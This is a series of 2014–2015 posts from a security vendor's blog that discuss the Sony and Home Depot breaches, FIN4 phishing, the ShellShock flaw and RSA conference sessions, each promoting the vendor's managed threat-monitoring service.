eSentire Blog

Would Active Threat Protection from eSentire Have Prevented the Sony Hack?

Posted by Mandy Bachus on Thu, Jan 15, 2015 @ 08:30 AM

by J.Paul Haynes

jpaulIn the weeks that have passed since the well-publicized Sony breach I have been asked the same question dozens of times, ‘could eSentire’s services have prevented this breach?’ I should say eSentire does not have all the details about this particular breach and we are relying on recent comments issued by FBI Director James Comey and Sony’s own CEO to give us insight to make a determination. In short, the answer is that there is a high probability that the type of threat Sony experienced would have been detected and contained had continuous monitoring like that provided by eSentire, been employed.

Regardless of how the threat actors (or hackers), gained initial network entry access, the resulting breach actually would’ve taken several weeks to achieve, not days. The combination of state-of-the-art detection technologies and human monitoring  – the core premise of Active Threat Protection – would have immediately flagged inconsistencies associated with the attack.

When a breach of this level occurs there are several red flags that arise before the damage is done. The key to preventing a serious breach is to identify the significance of those red flags and actively mitigate the harm. Here are some examples of the inconsistencies that should have set off alarm bells:

1. Numerous external connections using non-company proxy servers (eSentire Solution: Network InterceptorTM to identify the connection attempts and Asset Manager Protect and Country Killer to recognize blacklisted IP addresses).

2. Lateral movement within the network originated from different hosts (eSentire Solution: Network InterceptorTM and Host Interceptor).

3. For exploit deployment, numerous payload drops would have to occur (eSentire Solution: Active Forensics, Network InterceptorTM and Executioner).

4. Changes in logging, as privileges were escalated to gather the necessary data to extract (eSentire Solution: Log SentryTM).

5. Finally, Active Threat Protection would have caught and alerted a threat analysis as a result of the 100 TB data exfiltrating, as described by Sony’s CEO (eSentire Solution: Active Forensics and Network InterceptorTM).

In the world of Active Threat Protection, we act on each of these signals immediately. The elements of this attack are what we detect and block everyday. Intricate attacks such as these are becoming commonplace – so much so that leading analyst firm Gartner Research published a best practices framework (in 2014) to help organizations defend against and mitigate against these kinds of targeted attacks.

As we have seen with the case of Sony, the clean up work involved after a breach has occurred is far more complex and expensive than the preventative measures available to stop and prevent this level of damage.

Without forensic-level network traffic at your disposal, the job of tracking down the culprits and retrieving data is immeasurably more difficult – approaching impossible. In hindsight it is easy to say, “I should have used a working fire alarm,” after you’ve experienced a house fire. In the same way, we don’t want a business to find out too late that they could have had protection measures in place to protect their high value assets.

When we revisit the question of whether Active Threat Protection would help to prevent a breach like Sony’s, the answer is that every indicator points to yes.

J.Paul Haynes is CEO at eSentire (

Tags: Active Threat Protection, Data Breach

Just another day at the office: protecting clients from complex threat networks with Active Threat Protection from eSentire

Posted by Mandy Bachus on Wed, Dec 03, 2014 @ 02:38 PM

by J.Paul Haynesjpaul

On Dec. 1, a large US-based cybersecurity firm received extensive international media coverage for a reported cybersecurity incident. The incident focused on a threat actor classified as “FIN4”. Reports describe an active targeted phishing campaign with a focus specifically targeted at “the emails of C-level executives, legal counsel, regulatory risk, and compliance personnel, and other individuals who would regularly discuss confidential, market-moving information”.

The technique uses spear-phishing emails to gather credentials from users and return them back to the “FIN4” Command and Control servers (CnC) where the login credentials are then used to log into the users webmail remotely through TOR to escalate the attack. Again the level of angst was escalated further.

While this news article may be the first mention of “FIN4”, eSentire has been tracking and mitigating this very activity for more than a year. Late in 2013, eSentire issued a service advisory to its client base giving visibility to a .docm file circulating through the hedge fund atmosphere. At the time, eSentire’s Security Operations Center flagged what is now known as “FIN4” activity at its earliest inception. Then, the intent of the attack was the same: to drive a spear-phishing campaign with the explicit intent of accessing sensitive financial data in the hedge fund market through credential harvest.

The story surrounding “FIN4” is an important one, however, a story like this reminds us of the complexity and challenges faced by the Information Security industry. Complicated threats like these don’t pop up overnight. Dedicated forensics is critical in identifying and managing threats of this nature. eSentire clients have not been affected by “FIN4” attacks thanks to our Security Operations Center’s ongoing forensics and layered Active Threat Protection services.

What is it about the eSentire approach to Active Threat Protection that’s so unique? We’re able to see and mitigate threats of this nature through continuous monitoring. eSentire analysts continually monitor ALL our client’s network traffic, looking for signs of atypical behavior by utilizing ‘operationalized forensics’ - a technique pioneered by eSentire - which is the continuous analysis of all traffic flowing into and out of client networks.

As with the attack initially detected by eSentire in 2013, when a compromised word document containing the macro executes and connects to an external server and transfers data - in this case user credentials to an unfamiliar IP destination - we notice those unusual behavioral signals and immediately scrutinize it.

With our DVR-like capabilities, our skilled threat analysts rewind and replay the traffic and critically analyze it. If the traffic looks malicious, we block that specific connection on that customer’s network. Next, the block is propagated to all other eSentire subscriber networks through our Asset Manager Protect service, ensuring all clients are protected from the threat in question. At eSentire, this is standard operating procedure, 24/7/365, whether during business hours on Wednesday or at 2AM on Sunday.

If your first visibility into a major attack network like that publicized this week comes from a best-in-class forensic firm, the horse is likely already out of the barn. At this stage of breach you are also calling lawyers, regulators and law enforcement. Even worse, you have spent at least three to five full years of what Active Threat Protection services from eSentire would have cost. Let’s not rule out impact to reputation and brand which can trigger in a New York minute.

With Active Threat Protection from eSentire, clients benefit from immediate threat isolation, mitigation and real-time reports. Quite literally we are talking about an ounce of prevention versus a pound of cure. 

There’s a reason why eSentire is the trusted, award-winning security services provider to more than 450 financial services firms, legal, extractive and healthcare organizations. We can comfortably lay claim to pioneering Continuous Advanced Threat Protection, which leading analyst firm Gartner Research began covering in June 2014 as a best practices framework for defending against cybersecurity attacks.

In our world, managing and mitigating a threat like “FIN4” is simply another day at the office.

J.Paul Haynes is CEO at eSentire (

Tags: Active Threat Protection

Phishing Expedition: Protect Your Organization from Phishing Exploits

Posted by Mandy Bachus on Mon, Nov 10, 2014 @ 04:35 PM

by Eric Ritter

EricRitterTwo months ago, Home Depot announced it had been the target of an elaborate hack through a third-party vendor. The attack successfully embedded software within thousands of self-checkout machines across Canada and the United States, which silently harvested credit card information for months.

Just last week, new reports revealed more damage; in addition to the library of 56 million credit card accounts, hackers also gained access to 53 million customer email addresses. In the case of the Home Depot hack, cyber criminals accessed the enterprise with stolen vendor credentials, likely acquired through phishing campaigns.

The Home Depot hack is among several targeted major retailers this year. While businesses work to strengthen their cybersecurity posture, these attacks amplify the vulnerabilities of supply and distribution chains, and vendor systems used by countless organizations, regardless of industry.

Phishing scams are ubiquitous and often incredibly effective. ‘Smash and Grab’ describes attacks used to achieve quick monetary return, through access to specific financial data.

Spear-phishing is among a sub-set of phishing campaigns now gaining momentum. These attacks are far more surgical and often take more effort to execute. They target specific individuals within an organization, like a CFO or CEO. First cyber criminals gain access to the executive’s email account. Next they’ll drive the phishing campaign, usually by issuing a document to employee and requesting password confirmation for records update. In most cases employees will provide this information without hesitation, given that the source appears to be trusted.

These attempts are far more sophisticated than historical bids involving lottery or inheritance claims. Today, what we see are polished emails, perfectly branded to reflect a legitimate organization, like a trusted credit card company, bank or other vendor.

The objective is always the same – convince the recipient to enter their credentials by requesting identity verification. In a business setting, employees sifting through hundreds of emails daily could see such an email as innocuous, and click a link or submit credentials without thinking twice.

At eSentire, we see thousands of phishing attempts every week, and more than a dozen custom-crafted spear-phishing attacks.

So what can you do to protect your organization from the onslaught of phishing campaigns seeking to destroy and disrupt your organization? In addition to robust cybersecurity policies, staff training and education is critical. Be sure to communicate cybersecurity risks and the nuances of phishing to employees at any level across the organization.

In an era of multi-tasking and challenging workloads, employees must remain vigilant and cautious of suspicious emails as they are on the first line of attack. Legitimate organizations never ask clients or employees to click a link or enter confidential credentials via email or website submission. And if ever in doubt, don’t respond. Odds are an authentic request would be communicated by some other means.

Our motto at eSentire: don’t take the bait and don’t click the link.

Eric Ritter is Director, Security Operations Center and Client Experience at eSentire (
 Read more on phishing threats in this month’s issue of HFMTechnology.


Tags: Spear Phishing attack

ShellShocked: The Effects and Implications of the New "ShellShock" Exploit

Posted by Mark J. McArdle on Fri, Sep 26, 2014 @ 11:19 AM

markMcArdleeSentire has visibility into significant activity related to the “ShellShock” exploit (CVE-2014-6271 & CVE-2014-7169).

Our take: ShellShock is a powerful remote execution exploit affecting many systems running Bash on Linux and Mac OS. While this vulnerability was publicly disclosed September 24, it has the potential to be more damaging than Heartbleed. The primary resources at risk are Internet-facing services that utilize Bash, but there are also risks to consumers running Mac OS and Linux on their laptops and desktops. While Heartbleed was a narrow and focused event that was exploited by those with extensive technical knowledge, ShellShock enables attackers with very basic programming knowledge to launch command shells on a remote system and then have that shell execute any command permitted by the permissions configured on that system. 

Take action: A patch for Bash is now available, and everyone should be applying this patch as soon as possible. Unfortunately, there currently isn’t a patch available for Mac OS. eSentire has outlined several proactive actions for enterprises and will continue to release updates on ShellShock as it develops.

eSentire Security Operations Center (SOC) analysts have real-time access to attack traffic through our full packet capture and archiving, and can investigate not just the superficial aspects of the attack reported in event logs, but understand the specifics of the attack script. We can identify the payloads it may have brought down, the commands and file access it attempted etc. eSentire analysts also witnessed attackers attempting to perform reconnaissance and compromise systems by installing malware through simple scripts. 

Our analysts interpret events in real-time and utilize advanced tools that make security event information immediately actionable. In the case of ShellShock we were able to protect our client networks from potential exploits as they evolved. And with a capability we call Targeted Retrospection, we can rewind our analysis DVR-style to check if any attacks were attempted before Shellshock was publicly disclosed; this helps us identify previously compromised systems and significantly reduces the impact of an attack.

While traditional log information can tell you a specific attack signature has been invoked, attack signatures are generalized to be useful against a class of exploit and not just a specific instance.  When they get a hit, they record the event, but not the specifics of the attack payload. There is no forensic capability in a log file when it comes to attacks like this and we don’t think that’s a very effective approach to Continuous Advanced Threat Protection.

In the meantime, you can learn more about ShellShock through these resources:

Mark J. McArdle serves as Chief Technology Officer for eSentire.

When Fiction Becomes Fact: Cyber Espionage on the Rise

Posted by Mandy Bachus on Wed, Aug 13, 2014 @ 04:23 PM

While cyber espionage has long been the lure of many thrilling Hollywood stories, it’s fast become headline news, splattered regularly throughout the pages of national publications. Take this recent admission from the National Research Council  (NRC) for example: Canada’s premier research and technology organization announced a major IT systems breach, which allowed perpetrators access to R&D data specific to aerospace, genetically modified foods, medical diagnostics and more. The Canadian government publically singled out China, while China, in return denied the “groundless” allegations.  This comes hot on the heels of the White House’s groundbreaking motion to file criminal charges against five Chinese army officers for alleged cybercrimes and cyber espionage.

As nation-state actors pursue government secrets, a slew of other threat actors lurk, quietly chasing intellectual property that is equally as valuable. The Cyber Security Protection Alliance released a study that noted that last year, 69% of Canadian businesses reported some kind of attack over a 12-month period. If recent news stories are any indication, this trend will unquestionably continue its steep incline.

At eSentire, we continue to partner with a multitude of organizations that recognize the need to evaluate and augment their security posture. Whether financial institutions guarding trading data, law firms protecting client information or extractive industries battling hacktivists, our Active Threat Protection platform protects clients and prevents attacks with real-time detection and mitigation, 24/7. We keep our clients OUT of the headlines, and provide aggregate reports that detail each and every blocked attack.   

If cyber criminals can penetrate government infrastructure, they will easily (and successfully) target organizations with a weak security posture. This Fall, eSentire will appear at a variety of industry conferences providing a platform for cyber security discussion and understanding. Don’t wait to become a headline – get the information you need to improve your security posture today.

Tags: cyber security, Active Threat Protection, Cyber Espionage

The Cyber Security Grand Slam

Posted by Mark Sangster on Mon, Mar 31, 2014 @ 09:00 AM

The long winter is over: today is the official opening day of the 2014 major league baseball season. Here in the Toronto area we are cautiously optimistic over the Blue Jays’ prospects while thinking very fondly of the 1992-93 seasons.

Of course, back in the early 1990s cyber crime wasn’t the big deal it is today. Back then the interconnected world in which we now live was just starting to take shape. Today, everything from bank assets and personal credit card data to intellectual property and trade secrets all reside on corporate networks that clever cyber criminals relentlessly target.

basball diamond resized 600

At eSentire, it occurred to us that the game of baseball provides a good analogy for cyber security preparedness and attack response.

Maximizing your cyber security posture can be likened to rounding the bases:

  • First Base. Many security products and services will get you here. They monitor events and even stop threats with a known signature. This is a basic capability every company needs, but it only gets you to first base.
  • Second Base. Some products can detect threats that got by first base, usually by analyzing aggregated log data.
  • Third Base. There are services such as legacy Managed Security Services Providers (MSSP) that will notify you, via an automated alert, email, or a phone call, that a suspected breach has occurred.

Now what? Getting from third base back to home is the great conundrum of the cyber security industry.

The vast majority of cyber security products and services concentrate on prevention. Very few offer practical remediation assistance.

Once they’ve notified you, the MSSP considers their job done, but you’re stuck on third base while your systems are being ransacked.

Cyber security has become an incredibly complex field. The only way to fully address a serious security incident such as an advanced threat or a zero day attack is with the help of trained experts.

In baseball, a pinch hitter is such an expert, who acts as a substitute batter. The team manager can use any player who has not yet entered the game as a substitute, and the tactic is often used to place specialized skills (base hitting ability) at the plate when they are most needed.

When a cyber attack commences, companies are facing a crisis situation. They need cyber security pinch hitters on their team – and they need them now. At eSentire, we call this Active Intervention.

Our Network Interceptor solution includes the concept of Embedded Cyber Security Incident Response. That is, our experts are already on your team, monitoring network events in the background. When a real threat unfolds, they are like a pinch hitter – ready to enter the game and get you back to home plate 

Any company that relies on a cyber security program without Active Intervention is operating without a safety net. They are doomed to be stranded on, at best, third base when a difficult security incident happens.

It’s tough (and expensive) to bring in experts when they aren’t already on your team. This year, you can take steps to maximize your cyber security posture by incorporating Active Intervention into your security program.

Go Jays.

Tags: cyber security, Embedded CSIR, Cyber Security Incident Response

Notes from RSA: It's Not Your Security Budget, It's How You're Spending It

Posted by Mark Sangster on Wed, Mar 05, 2014 @ 10:02 AM

One resounding theme to emerge from this year’s RSA Conference is that IT security budgets are skewed too much towards automated prevention technology and not enough towards incident response.

In a keynote, Art Gilliland discussed this over-investment on the prevention side, noting that it consumes the overwhelming majority (86%) of annual cyber security spend.

An intriguing session on Security Shelfware detailed how a surprising number of SIEM (and other) security products end up gathering dust instead of being actively used.

In a panel discussion on cyber security incident response, Ponemon Institute founder Larry Ponemon explained what’s behind the scarcity of CSIRT resources, recommending greater investment in incident response.

Then, on the RSA’s final day, Jay Leek – CISO at Blackstone – weighed in from the user’s viewpoint: A CISO’s Perspective: Protecting with Enhanced Visibility and Response.

This valuable session argued for reallocating IT security investment, moving some money from Prevention (where a lot of shelfware exists) to Visibility, Intelligence – and the underfunded Reactive area, upgrading it to a Planned Response footing.

Leek noted that the cost of response has sharply increased, up 75% from $200k to $341k per incident in 2011 – and we can be certain that the cost in 2014 is even higher. Unfortunately, the cost to attackers is much lower. In one slide Meek showed that attackers could breach a company over 2,000 times before spending as much as the company spends on a single incident.

These trends are not sustainable, according to Leek. To mitigate such high costs, investment in incident response, not just prevention, is needed.

This investment can take a variety of forms.

  • For better Visibility, organizations should acquire technology that provides real time awareness of network events, thus collapsing the time delay inherent to SIEM products that rely on system and device logs.
  • For greater Intelligence, defenses can be tuned based on behaviors and attack profiles.
  • For Planned Response, you need trained security analysts who have ready, real time access to actionable forensics.

The market for Prevention-focused products is saturated – but for vendors it’s a lot easier to program a product to identify and stop known threats than it is to provide a solution to an incident that has unknown attributes.

Response is difficult to automate. For serious threats, effective response always requires human expertise. You need security analysts who know how to examine the forensics and what actions to take.

Having ready access to this kind of expertise is a challenge – as Jon Oltsik noted in his session on the Security Skills Shortage.

Small to midsize companies with stretched IT resources are particularly exposed in the skills area – how can they make the investments all of these speakers have recommended?

There’s good news. The new field of Active Threat Protection is designed for just this sort of balanced approach to cyber security.

Key attributes of Active Threat Protection include the acquisition of network data in real time, the ability to detect suspicious behaviors, and Active Forensics that help to eliminate false positives while highlighting the real potential threats.

These capabilities are topped off by Embedded Cyber Security Incident Response, which is the integration of trained security analysts into the mix as network events are being assessed – instead of after a crisis has erupted when it’s too late to minimize the damage.

Active Threat Protection is surprisingly affordable, giving companies a practical way to rebalance their IT security budgets for greater impact and better ROI as numerous RSA sessions have recommended.

It enables organizations to increase their Visibility, develop greater threat Intelligence, and include active expertise into their Planned Response processes – all of which dramatically reduces the cost of handling an incident while maximizing cyber security protection.

Tags: cyber security, Active Threat Protection, RSA, Cyber Security Incident Response

Notes from RSA: Investing in Silver Bullets

Posted by Mark Sangster on Thu, Feb 27, 2014 @ 09:00 PM

One of the most interesting keynotes at this year’s RSA conference was given by Art Gilliland, SVP of HP Enterprise Security Products, on Stop Looking for the Silver Bullet: Start Thinking Like a Bad Guy.

You can view a recording of his presentation here.

Gilliland noted the impossible odds that are stacked against cyber security teams, where to be considered successful the good guys have to win every time, but the bad guys only need to win once.

Despite increased investment in cyber security, the number of breaches continues to rise.

In looking at where this investment is going, HP and Ponemon Institute found that a whopping 86% of the cyber security budget goes toward prevention.

Further research revealed that companies could improve the ROI of their security budgets by shifting investment into the security intelligence system – the people and processes as well as the technology that must combine to protect the enterprise.

“We are over-invested in products,” said Gilliland, in the best sound bite of the session. At eSentire, we couldn’t agree more.

We’ve said for some time that security automation, by itself, doesn’t solve the problem. Automated products are notoriously difficult to tune and keep updated, and even so the cyber criminals have a habit of devising new ways to evade automated defenses.

Too often, organizations desperately want to believe they can buy a technology silver bullet for cyber security – and there are plenty of vendors who are happy to take their money. Yet the number of breaches continues to rise – what’s wrong with this picture?

Companies that rely solely on automated security products are nursing a false hope, not realizing how exposed they really are.

Of course, security automation is needed – and it is very useful in blocking known threats. But it isn’t a panacea. We agree that investments need to include good technology but also be more balanced towards the Security Intelligence System.

A new security concept reflects this reality. We call it Active Threat Protection. It is an approach that combines detection, analytics, and human experts to deliver a higher level of protection than is otherwise possible.

Active Threat Protection acknowledges that you cannot detect every threat, and that advanced threats only reveal themselves by behaviors. It is a more practical approach that recognizes the bad guys will at times succeed in penetrating your network – but you can still stop attacks and minimize exposure if you have invested properly in people and processes as well as analytics.

Companies need to stop chasing security technology silver bullets, because they cannot possibly prevent every attack – succeeding every time while the bad guys only need to succeed once – eventually there will be a breach.

With Active Threat Protection, they have a workable solution that acknowledges the realities of today’s cyber wars.

Tags: cyber security, Active Threat Protection, Data Breach, RSA

Notes from RSA: Incident Response Inequality

Posted by Mark Sangster on Wed, Feb 26, 2014 @ 06:37 PM

It’s Day 3 of RSA, and one of the highlights was a panel discussion on Why Cyber Incident Response Teams Get No Respect.

The session had great insights on how CSIRT can be improved, but we couldn’t help thinking that it also pointed out the inequality in CSIRT capabilities between large enterprises and midsize companies.

Supported by a fresh research report from the Ponemon Institute, a major finding was that more investment is needed in CSIRT if organizations are going to materially improve their response preparedness.

It goes without saying that some organizations may have more to invest than others.

When we look at the survey demographics, we see that 82% of the respondents were from companies with over 500 employees – and nearly two thirds were from 1000+ employee companies.

Even so, nearly half of those surveyed (45%) reported that their company has no one dedicated full time to incident response. A further 28% have one resource dedicated to CSIRT. So, the reality is that most companies get by with part time resources in this crucial area.

The study’s recommendation that organizations should invest more in CSIRT is spot on. In very large enterprises, this may be an exercise in raising awareness of the need at the C-level in order to garner support. But in many companies, it’s an exercise in finding budget that simply doesn’t exist.

A trenchant observation in the study is that it’s easier to dedicate budget to prevention, on the theory that if that money is well invested then response won’t be as necessary – because threats won’t morph into attacks.

However, this is a false hope. Every company needs a plan for and resources designated to incident response – because sooner or later they will have an incident to deal with.

It takes specialized expertise to respond quickly to a security incident – fully understanding what happened and confirming that the response was successful and “it’s safe to go back into the water.” For most companies, that means bringing in outside experts.

While affirming that using outside consultants to augment in-house staff is a best practice, the study pointed up two valid problems with retaining third party consultants for incident response help.

First, outside parties are unlikely to “have an understanding of the IT infrastructure they are investigating as well as the business running on top of it.” They need read-in time, right when a crisis is unfolding.


“A third-party contractor can lose precious time navigating to the resources they need. In addition, many of the tools and audit trails that are needed in order to respond effectively to an incident must be in place before the incident begins, and cannot be established on the fly during an incident.”

All this brings us back to the question – what is a midsize company with an already-stretched IT budget to do? It sounds like world-class CSIRT is only possible if you have lots of money.

Fortunately, there is a solution: Embedded Cyber Security Incident Response.

This new concept is part of the Active Threat Protection approach to cyber security. It includes technology that can aggregate network events and detect telltales of suspicious activity, coupled with trained security analysts who actively review these events as they happen – and take action if needed.

Embedded CSIR solves the problem of getting outside consultants up to speed on your IT infrastructure and business processes – because they are already there. It solves the problem needing analytical tools and audit trails – because those are already there too.

At eSentire, we think Embedded CSIR also solves the inequality problem, because even midsize companies can access Active Threat Protection without breaking the bank.

Get this white paper to learn more about Embedded CSIR.

Tags: cyber security, Active Threat Protection, RSA, Embedded CSIR, Cyber Security Incident Response

Notes from RSA: Security Shelfware

Posted by Mark Sangster on Tue, Feb 25, 2014 @ 06:31 PM

An insightful and entertaining session at RSA today was Security Shelfware: Which Products Are Gathering Dust in the Shed and Why?

This topic really interests us at eSentire, because we conduct hundreds of Enterprise Vulnerability Assessments every year and more often than not we find security products turned off or otherwise on the shelf. We always wonder why a company would pay good money for a security product only to let it fall into disuse (or never really use it in the first place).

Presented by Javvad Malik of 451 Research, the session highlighted some very interesting findings from an original research study.

Many perfectly good security products become shelfware. They work as advertised, and companies buy them with every intention of getting useful value out of them – but somewhere along the line, something happens.

Not surprisingly (at least to us), SIEM products lead the field as those most likely to wind up on the shelf. We suspect that a big reason for this is the notorious difficulty in tuning these systems. Too tight, and you get flooded with so many alerts that you can’t possibly handle them all. Too loose, and you miss that one alert you really needed.

This is collaborated by the fact that, in the research, one of the main reasons given for security shelfware is a lack of staff to use the product properly, and a lack of time or expertise to implement the product properly. Keeping these systems updated and tuned is a highly complex, involved and never-ending task.

As we noted yesterday, cyber security analysis is an increasingly specialized skill, which was validated by Jon Oltsik’s presentation on The Security Staff and Skills Shortage is Worse than You Think! One of the points in that session was that too many false positives are hampering detection and response.

When you combine the two sessions, it’s easy to see why certain security products become shelfware. They may be doing exactly what they’re programmed to do, but if the user companies are stretched for time and resources, they simply won’t be able to analyze everything these products throw their way.

It’s no wonder that the 451 Research study found users’ number one attribute of a good security product to be “centralized (and actionable) reporting.” Beleaguered IT security staff do not need more alerts – they need fewer ones that they can action.

This was a huge disconnect in the study, where vendors rated “out of the box functionality” as the number one sign of a good product while users rated that attribute near the bottom.

Of course, the study pointed out many other interesting things – such as the fact that often companies buy a security product merely to satisfy a compliance requirement but then they end up not using it.

We do appreciate the insights and believe that there is a thread at RSA pointing up the skills shortage in cyber security. This trend will not change any time soon, and smaller to midsize companies will be most impacted because they simply do not have the resources to staff a 24x7 security operations center in the same way that very large enterprises can.

At eSentire, we’ve developed a new approach to cyber security that we call Active Threat Protection. It is a combination of technology and expertise that fills the skills gap while eliminating all those false positives – and it’s surprisingly cost effective, so small to midsize companies can access it.

Embedded Cyber Security Incident Response is a core principle in Active Threat Protection, and it is certainly worth learning about if you have confidential data to protect yet limited resources to devote to security.

Tags: cyber security, Active Threat Protection, RSA

    Subscribe by Email

    Follow Me